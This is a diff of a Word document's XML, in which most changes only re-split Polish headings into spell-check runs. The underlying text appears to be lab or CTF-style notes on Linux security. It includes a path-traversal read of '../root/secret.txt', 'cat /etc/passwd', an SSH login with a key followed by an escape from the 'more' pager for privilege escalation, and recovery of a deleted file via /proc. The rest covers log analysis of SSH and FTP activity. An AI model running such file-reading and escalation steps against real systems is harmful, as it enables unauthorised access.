+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>host_ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -352,8 +1106,37 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Dostęp do plików należących do użytkownika root </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Dostęp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>plików</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>należących</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>użytkownika</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> root </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -365,7 +1148,7 @@
           <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId14" w:history="1">
+      <w:hyperlink r:id="rId15" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -421,6 +1204,7 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>../root/secret.txt</w:t>
       </w:r>
     </w:p>
@@ -428,19 +1212,40 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Podwyższenie uprawnień użytkownika </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId15" w:history="1">
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Podwyższenie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uprawnień</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>użytkownika</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId16" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -488,18 +1293,34 @@
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Inna powłoka niż Bash </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId16" w:history="1">
+        <w:t xml:space="preserve">Inna </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>powłoka</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>niż</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bash </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId17" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -523,23 +1344,55 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
         </w:rPr>
-        <w:t>cat /etc/passwd</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>cd /usr/bin/</w:t>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>cd /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -596,6 +1449,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> (-&gt; </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -603,6 +1457,7 @@
         </w:rPr>
         <w:t>bob_key.pem</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -619,35 +1474,190 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>ssh -l bob localhost -i bob_key.pem</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ( na zmniejszonym oknie terminala by zatrzymać działanie programu ‘more’)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>klawisz ‘v’</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>ssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l bob localhost -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>bob_key.pem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ( </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>zmniejszonym</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>oknie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>terminala</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> by </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>zatrzymać</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>działanie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>programu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ‘more’)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>klawisz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ‘v’</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -670,20 +1680,32 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Usunięty plik </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId17" w:history="1">
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Usunięty</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>plik</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId18" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -702,47 +1724,207 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>ps -x ( lub ps -aux)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t>szukamy w /proc danego PIDa i lecimy do /fd</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analiza logów z konkretnego zakresu czasowego </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId18" w:history="1">
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>ps</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -x ( </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>lub</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>ps</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -aux)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>szukamy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> w /proc </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>danego</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>PIDa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>lecimy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>fd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Analiza</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>logów</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>konkretnego</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>zakresu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>czasowego</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId19" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -789,19 +1971,49 @@
       <w:pPr>
         <w:pStyle w:val="Nagwek4"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analiza logów konkretnej usługi </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId19" w:history="1">
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Analiza</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>logów</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>konkretnej</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usługi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId20" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -841,26 +2053,103 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
         </w:rPr>
-        <w:t>cat audit.log | grep -e "vsftpd\|ftp\|xinetd"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analiza udanych prób logowania się na SSH </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId20" w:history="1">
+        <w:t>cat audit.log | grep -e "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>vsftpd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>\|ftp\|</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>xinetd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Analiza</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>udanych</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>prób</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>logowania</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>się</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> SSH </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId21" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipercze"/>
@@ -900,26 +2189,95 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
         </w:rPr>
-        <w:t>cat audit.log | grep -e "sshd.*invalid"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analiza wielu nieudanych prób logowania się na SSH </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nagwek4"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId21" w:history="1">
+        <w:t>cat audit.log | grep -e "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>.*invalid"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Analiza</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wielu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nieudanych</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>prób</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>logowania</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>się</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> SSH </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
